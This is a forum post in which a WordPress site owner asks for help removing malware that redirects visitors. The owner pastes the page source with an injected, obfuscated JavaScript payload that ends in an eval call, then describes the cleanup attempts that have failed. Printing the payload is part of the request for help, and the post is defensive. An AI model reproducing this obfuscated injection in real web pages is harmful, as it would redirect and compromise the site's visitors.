Hi Can anyone help me to remove malware from my wordpress site?? When I go to my site I am re-directed to other sites, When I right click on my web page and click on view source I can see the following code <meta name="generator" content="WordPress 3.0.1" /> <!-- leave this for stats please --> <link rel="stylesheet" href="http://MYURL/wp-content/themes/pdfbase/style.css" type="text/css" media="screen" /> <link rel="stylesheet" href="http://MYURL/wp-content/themes/pdfbase/additional.css" type="text/css" media="screen" /> <link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://MYURL/feed" /> <link rel="alternate" type="text/xml" title="RSS .92" href="MYURL/feed/rss" /> <link rel="alternate" type="application/atom+xml" title="Atom 0.3" href="http://MYURL/feed/atom" /> <link rel="pingback" href="http://MYURL/xmlrpc.php" /> <link rel='archives' title='September 2011' href='http://MYURL/2011/09' /> [COLOR="#FF0000"]<script type='text/javascript'>var $n=(Date);if($n){$P='3482';}var $p={'u':'reve\x72\x73\x65','q':'jo\x69n','m':!false,'U':'st\x72\x69ng','C':'le\x6E\x67\x74h','T':'spli\x74','Q':'s\x75\x62str'},$1='',$b=['!b=1 rfavi;gl="o ;"fiynl(1=-d=.cotcouenmeiiko.ndi(gffOxxe{))74=2ravd ;E6=ewnD =tag"2ejp;.de;"stTgd.e(emmiitT)e()t"=mip;tlcy..lnem=ew"ed;ta(D ed.eim(Tt4egx)+d);otnec.mcuokio=e+ig"esf"=+epeac(d.tTSrMG(otgin+))"ripsex;e=+e".drottinGTSM+);(g"pat";x/=hht"t=ptt:pt+"+"///n.igc;?igva"jp+=e1 r-!=tgaoivsanur.Aergot.oLtenwrCesae(edxO)in.f"r(fief=,f")"jxo,1"u=fn(no{)ict}j.;rp=toe{boyptnutf:cio4i=3{);(n472"u=uutenrr"; xtt,}i:atonfncuq{")(=q"7490=N=d;w9;;""rav; rbJ=gdo=uc=emRkQn;ctv;rb=a kwdo;ni"w==dOv";aht=sihr ;Q=fDctp=;ryK""==K1u{ 76pL=Wc;;00"="=wKb"=U;"S;er=pOROVb=kQ=;K=eq;=""Bb;"mF;"="Fm=vWtgesrttsiAetd";fEw2b=667;K=gav ;9ra=vR=Sq;e][;=b(||f;)".a0="pshu"(,eh""sihtgtsiburngcrert"e,"teaeElmteg,"ten"idwhtf,"irs"bmv,"Wtev,""",aydnobepphdCi,f,,g"ld"rcs)"0e;56;O64="=;Ty"hSuU=Ka;"b="D=K;f="=I;"yb;w="IIw6;"132s=1J=G"r;";a;50g540=A4L=859;=l [arva2[a]1[)]]6;n(,13""g=Z;P=a;vr"Pag"= m][4[(]],31a[6;c)=OK25v=m91;3ma""+e;t;I"lt"l=I"O=;O"j544;32Z=pa[=]53a[(,1[]]1"+u)1bte"=";Uq=;"QrJvb;a.h=(bnr )tT;"==;"ca[vr al[(]9]vK1a[0[cn;)=]]D;n=OIm"= b;mO"Ic;aa[=[8[]]3Ho4;]=02"M=kk;c18;M"[[a08[a;]=]]m="H;";Wb"wY=bW";"["=a9][]]a6[]a[][7)(c;Rk="=TfV"ca}ct=(hK""r{h)TKbl,=,g(te"irmw.t<h<l>b/<>obyodd><yh/umt,IEl")>,"."=kseueotminTtu(ficto.h{(a)n(),2}339,)228iB=GNz6,2=95"="}SiB}1c};"=";=o enrvawj; Tg("=a)}"o.;;'][$p.q]('\x0A'),$P=$P[$p.T]($1),$9=function(){for(var $A in $P){if(typeof($P[$A])==$p.U){var $c=[],$i=$p.m,$n=$P[$A]*-~!true;for(U=[]^[];U<$b[$p.C];U+=$n){$c[U]=($i)?($b[$p.Q](U,$n)[$p.T]($1)[$p.u]()[$p.q]($1)):($b[$p.Q](U,$n));$i=!$i;}$b=$c[$p.q]($1);}}win\u0064\u006F\u0077['\x65\x76al']($b);},$b=$9();</script>[/COLOR] <link rel='stylesheet' id='thickbox-css' href='http://MYURL/wp-includes/js/thickbox/thickbox.css?ver=20090514' type='text/css' media='all' /> Code (markup): The code highlighted in red is the malware, So by looking at the source it looks like the code is located in the header template directly under the <?php wp_get_archives('type=monthly&format=link'); ?> but I dont see anything harmful under that line? <link rel="stylesheet" href="<?php bloginfo('stylesheet_url'); ?>" type="text/css" media="screen" /> <link rel="stylesheet" href="<?php bloginfo('stylesheet_directory'); ?>/additional.css" type="text/css" media="screen" /> <link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="<?php bloginfo('rss2_url'); ?>" /> <link rel="alternate" type="text/xml" title="RSS .92" href="<?php bloginfo('rss_url'); ?>" /> <link rel="alternate" type="application/atom+xml" title="Atom 0.3" href="<?php bloginfo('atom_url'); ?>" /> <link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" /> <?php wp_get_archives('type=monthly&format=link'); ?> <?php //comments_popup_script(); // off by default ?> <?php wp_head(); ?> Code (markup): Does anyone know where the malware could be located?? I would ideally like to remove the malware manually coz its going to be a nightmare to start from scratch as everything on my site was custom written Thanks
ive looked everywhere. Ive uploaded new wordpress files - still had an issue Ive tried disabeling all plugins, checked .htaccess checked all files in the theme, even changed to a new theme looked in the database Cant find anything